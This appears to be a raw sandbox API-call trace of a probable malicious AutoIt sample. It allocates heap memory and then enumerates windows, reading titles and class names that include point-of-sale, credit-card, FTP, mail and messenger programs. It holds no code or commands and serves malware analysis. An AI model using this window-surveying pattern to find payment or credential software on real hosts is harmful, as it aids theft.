RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0131.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0131.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0131.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e300 [0131.219] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e300 | out: hHeap=0x12c0000) returned 1 [0131.219] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0131.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0131.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0131.219] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0131.220] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0131.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0131.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0131.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0131.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0131.220] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0131.220] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0131.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0131.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0131.222] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0131.222] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0131.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0131.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0131.222] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0131.222] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0131.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0131.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0131.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0131.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0131.222] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3e8 [0131.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3e8 | out: hHeap=0x12c0000) returned 1 [0131.223] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0131.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff5f0 [0131.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3e8 [0131.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0131.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0131.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0131.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd400 [0131.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0131.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd910 [0131.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0131.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7d8 [0131.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0131.287] EnumWindows (lpEnumFunc=0xf7aed4, lParam=0xfe5500) returned 1 [0131.287] GetWindowTextW (in: hWnd=0x10128, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.288] GetClassNameW (in: hWnd=0x10128, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ForegroundStaging") returned 17 [0131.288] GetWindowTextW (in: hWnd=0x100f8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.288] GetClassNameW (in: hWnd=0x100f8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ForegroundStaging") returned 17 [0131.288] GetWindowTextW (in: hWnd=0x100ca, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.288] GetClassNameW (in: hWnd=0x100ca, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0131.288] GetWindowTextW (in: hWnd=0x100a4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.288] GetClassNameW (in: hWnd=0x100a4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0131.289] GetWindowTextW (in: hWnd=0x100a8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.289] GetClassNameW (in: hWnd=0x100a8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0131.289] GetWindowTextW (in: hWnd=0x100b4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.289] GetClassNameW (in: hWnd=0x100b4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0131.289] GetWindowTextW (in: hWnd=0x100be, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.289] GetClassNameW (in: hWnd=0x100be, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0131.289] GetWindowTextW (in: hWnd=0x100c2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.290] GetClassNameW (in: hWnd=0x100c2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0131.290] GetWindowTextW (in: hWnd=0x1008c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.291] GetClassNameW (in: hWnd=0x1008c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0131.291] GetWindowTextW (in: hWnd=0x10098, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.291] GetClassNameW (in: hWnd=0x10098, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0131.291] GetWindowTextW (in: hWnd=0x100bc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.291] GetClassNameW (in: hWnd=0x100bc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0131.291] GetWindowTextW (in: hWnd=0x10080, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.291] GetClassNameW (in: hWnd=0x10080, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Shell_TrayWnd") returned 13 [0131.292] GetWindowTextW (in: hWnd=0x20048, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Network Flyout") returned 14 [0131.292] GetClassNameW (in: hWnd=0x20048, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ATL:00007FFB0FD84120") returned 20 [0131.292] GetWindowTextW (in: hWnd=0x100d6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.292] GetClassNameW (in: hWnd=0x100d6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0131.292] GetWindowTextW (in: hWnd=0x100cc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.292] GetClassNameW (in: hWnd=0x100cc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0131.292] GetWindowTextW (in: hWnd=0x802d6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="AutoIt v3") returned 9 [0131.293] NtdllDefWindowProc_W (hWnd=0x802d6, Msg=0xd, wParam=0x400, lParam=0x7df1a8) returned 0x9 [0131.293] GetClassNameW (in: hWnd=0x802d6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="AutoIt v3") returned 9 [0131.293] GetWindowTextW (in: hWnd=0x4035c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.293] GetClassNameW (in: hWnd=0x4035c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0131.293] GetWindowTextW (in: hWnd=0x20286, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Blank Page - Internet Explorer") returned 30 [0131.293] GetClassNameW (in: hWnd=0x20286, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="TabThumbnailWindow") returned 18 [0131.293] GetWindowTextW (in: hWnd=0x202d8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.293] GetClassNameW (in: hWnd=0x202d8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="VSyncHelper-0062D168-9f59f66") returned 28 [0131.294] GetWindowTextW (in: hWnd=0x20364, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.294] GetClassNameW (in: hWnd=0x20364, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Alternate Owner") returned 15 [0131.294] GetWindowTextW (in: hWnd=0x10336, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Omnipos") returned 7 [0131.294] GetClassNameW (in: hWnd=0x10336, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="omniposclass") returned 12 [0131.294] GetWindowTextW (in: hWnd=0x2021e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Nor Development Rather") returned 22 [0131.294] GetClassNameW (in: hWnd=0x2021e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="nordevelopmentRatherclass") returned 25 [0131.294] GetWindowTextW (in: hWnd=0x1036a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Force Which Baby") returned 16 [0131.295] GetClassNameW (in: hWnd=0x1036a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="force_which_Baby_cls") returned 20 [0131.295] GetWindowTextW (in: hWnd=0x10366, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Drive Law") returned 9 [0131.295] GetClassNameW (in: hWnd=0x10366, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DriveLawwindow") returned 14 [0131.295] GetWindowTextW (in: hWnd=0x10306, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="3Dftp") returned 5 [0131.295] GetClassNameW (in: hWnd=0x10306, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="3dftp") returned 5 [0131.296] GetWindowTextW (in: hWnd=0x10344, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Utg2") returned 4 [0131.296] GetClassNameW (in: hWnd=0x10344, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="utg2_cls") returned 8 [0131.296] GetWindowTextW (in: hWnd=0x10340, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Spgagentservice") returned 15 [0131.296] GetClassNameW (in: hWnd=0x10340, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="spgagentservicewindow") returned 21 [0131.296] GetWindowTextW (in: hWnd=0x102e6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Barca") returned 5 [0131.296] GetClassNameW (in: hWnd=0x102e6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="barca_class") returned 11 [0131.296] GetWindowTextW (in: hWnd=0x1038e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.297] GetClassNameW (in: hWnd=0x1038e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0131.297] GetWindowTextW (in: hWnd=0x10342, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Spcwin") returned 6 [0131.297] GetClassNameW (in: hWnd=0x10342, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="spcwin_wnd") returned 10 [0131.297] GetWindowTextW (in: hWnd=0x10338, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Fpos") returned 4 [0131.297] GetClassNameW (in: hWnd=0x10338, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="fpos") returned 4 [0131.298] GetWindowTextW (in: hWnd=0x10330, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Isspos") returned 6 [0131.298] GetClassNameW (in: hWnd=0x10330, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="issposwin") returned 9 [0131.298] GetWindowTextW (in: hWnd=0x1032e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Far") returned 3 [0131.298] GetClassNameW (in: hWnd=0x1032e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="farclass") returned 8 [0131.298] GetWindowTextW (in: hWnd=0x1032c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Edcsvr") returned 6 [0131.299] GetClassNameW (in: hWnd=0x1032c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="edcsvrwindow") returned 12 [0131.299] GetWindowTextW (in: hWnd=0x102e2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Coreftp") returned 7 [0131.299] GetClassNameW (in: hWnd=0x102e2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="coreftpclass") returned 12 [0131.299] GetWindowTextW (in: hWnd=0x1032a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Mxslipstream") returned 12 [0131.299] GetClassNameW (in: hWnd=0x1032a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="mxslipstream_cls") returned 16 [0131.299] GetWindowTextW (in: hWnd=0x10324, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Thunderbird") returned 11 [0131.300] GetClassNameW (in: hWnd=0x10324, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="thunderbird_app") returned 15 [0131.300] GetWindowTextW (in: hWnd=0x10322, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Aldelo") returned 6 [0131.300] GetClassNameW (in: hWnd=0x10322, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="aldelo_app") returned 10 [0131.300] GetWindowTextW (in: hWnd=0x10320, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Pidgin") returned 6 [0131.304] GetClassNameW (in: hWnd=0x10320, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="pidgin") returned 6 [0131.304] GetWindowTextW (in: hWnd=0x1031e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Outlook") returned 7 [0131.304] GetClassNameW (in: hWnd=0x1031e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="outlook_class") returned 13 [0131.304] GetWindowTextW (in: hWnd=0x10316, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Smartftp") returned 8 [0131.304] GetClassNameW (in: hWnd=0x10316, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="smartftp_wnd") returned 12 [0131.304] GetWindowTextW (in: hWnd=0x10308, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Webdrive") returned 8 [0131.305] GetClassNameW (in: hWnd=0x10308, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="webdrive_wnd") returned 12 [0131.305] GetWindowTextW (in: hWnd=0x10310, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Ccv_Server") returned 10 [0131.305] GetClassNameW (in: hWnd=0x10310, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ccv_server_wnd") returned 14 [0131.305] GetWindowTextW (in: hWnd=0x10314, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Creditservice") returned 13 [0131.305] GetClassNameW (in: hWnd=0x10314, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="creditserviceclass") returned 18 [0131.306] GetWindowTextW (in: hWnd=0x102f6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Flashfxp") returned 8 [0131.306] GetClassNameW (in: hWnd=0x102f6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="flashfxpwin") returned 11 [0131.306] GetWindowTextW (in: hWnd=0x10304, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Gmailnotifierpro") returned 16 [0131.306] GetClassNameW (in: hWnd=0x10304, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="gmailnotifierprocls") returned 19 [0131.306] GetWindowTextW (in: hWnd=0x10302, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Accupos") returned 7 [0131.306] GetClassNameW (in: hWnd=0x10302, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="accuposwindow") returned 13 [0131.307] GetWindowTextW (in: hWnd=0x10300, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Winscp") returned 6 [0131.307] GetClassNameW (in: hWnd=0x10300, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="winscp_win") returned 10 [0131.307] GetWindowTextW (in: hWnd=0x102fe, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Yahoomessenger") returned 14 [0131.307] GetClassNameW (in: hWnd=0x102fe, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="yahoomessenger_") returned 15 [0131.307] GetWindowTextW (in: hWnd=0x102fc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Whatsapp") returned 8 [0131.308] GetClassNameW (in: hWnd=0x102fc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="whatsapp_window") returned 15 [0131.308] GetWindowTextW (in: hWnd=0x102fa, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Active-Charge") returned 13 [0131.308] GetClassNameW (in: hWnd=0x102fa, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="active-chargeclass") returned 18 [0131.308] GetWindowTextW (in: hWnd=0x102da, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Operamail") returned 9 [0131.308] GetClassNameW (in: hWnd=0x102da, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="operamail_wnd") returned 13 [0131.308] GetWindowTextW (in: hWnd=0x102f4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Ncftp") returned 5 [0131.309] GetClassNameW (in: hWnd=0x102f4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ncftp_wnd") returned 9 [0131.309] GetWindowTextW (in: hWnd=0x102f2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Bitkinex") returned 8 [0131.309] GetClassNameW (in: hWnd=0x102f2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="bitkinex_win") returned 12 [0131.309] GetWindowTextW (in: hWnd=0x102f0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Absolutetelnet") returned 14 [0131.309] GetClassNameW (in: hWnd=0x102f0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="absolutetelnetcls") returned 17 [0131.309] GetWindowTextW (in: hWnd=0x102ee, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Foxmailincmail") returned 14 [0131.310] GetClassNameW (in: hWnd=0x102ee, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="foxmailincmailwin") returned 17 [0131.310] GetWindowTextW (in: hWnd=0x102ec, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Trillian") returned 8 [0131.310] GetClassNameW (in: hWnd=0x102ec, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="trillian_wnd") returned 12 [0131.310] GetWindowTextW (in: hWnd=0x102ea, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Filezilla") returned 9 [0131.310] GetClassNameW (in: hWnd=0x102ea, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="filezillawin") returned 12 [0131.310] GetWindowTextW (in: hWnd=0x102e8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Fling") returned 5 [0131.311] GetClassNameW (in: hWnd=0x102e8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="fling") returned 5 [0131.311] GetWindowTextW (in: hWnd=0x102e4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Centralcreditcard") returned 17 [0131.311] GetClassNameW (in: hWnd=0x102e4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="centralcreditcardclass") returned 22 [0131.311] GetWindowTextW (in: hWnd=0x102dc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Afr38") returned 5 [0131.311] GetClassNameW (in: hWnd=0x102dc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="afr38_window") returned 12 [0131.312] GetWindowTextW (in: hWnd=0x102de, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Alftp") returned 5 [0131.312] GetClassNameW (in: hWnd=0x102de, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="alftp_class") returned 11 [0131.312] GetWindowTextW (in: hWnd=0x102d4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Leechftp") returned 8 [0131.312] GetClassNameW (in: hWnd=0x102d4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="leechftpcls") returned 11 [0131.312] GetWindowTextW (in: hWnd=0x102d0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Scriptftp") returned 9 [0131.312] GetClassNameW (in: hWnd=0x102d0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="scriptftpapp") returned 12 [0131.312] GetWindowTextW (in: hWnd=0x102cc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Icq") returned 3 [0131.313] GetClassNameW (in: hWnd=0x102cc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="icq_app") returned 7 [0131.313] GetWindowTextW (in: hWnd=0x102ce, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Skype") returned 5 [0131.313] GetClassNameW (in: hWnd=0x102ce, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="skype_window") returned 12 [0131.313] GetWindowTextW (in: hWnd=0x102d2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Notepad") returned 7 [0131.314] GetClassNameW (in: hWnd=0x102d2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="notepad_") returned 8 [0131.314] GetWindowTextW (in: hWnd=0x20214, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.314] GetClassNameW (in: hWnd=0x20214, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0131.314] GetWindowTextW (in: hWnd=0x1026c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Story Police") returned 12 [0131.314] GetClassNameW (in: hWnd=0x1026c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Storypoliceapp") returned 14 [0131.314] GetWindowTextW (in: hWnd=0x1026a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Include Effect Seven") returned 20 [0131.314] GetClassNameW (in: hWnd=0x1026a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="include_effect_seven_") returned 21 [0131.315] GetWindowTextW (in: hWnd=0x10268, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Serve") returned 5 [0131.315] GetClassNameW (in: hWnd=0x10268, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="servecls") returned 8 [0131.315] GetWindowTextW (in: hWnd=0x10260, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Weapon Natural") returned 14 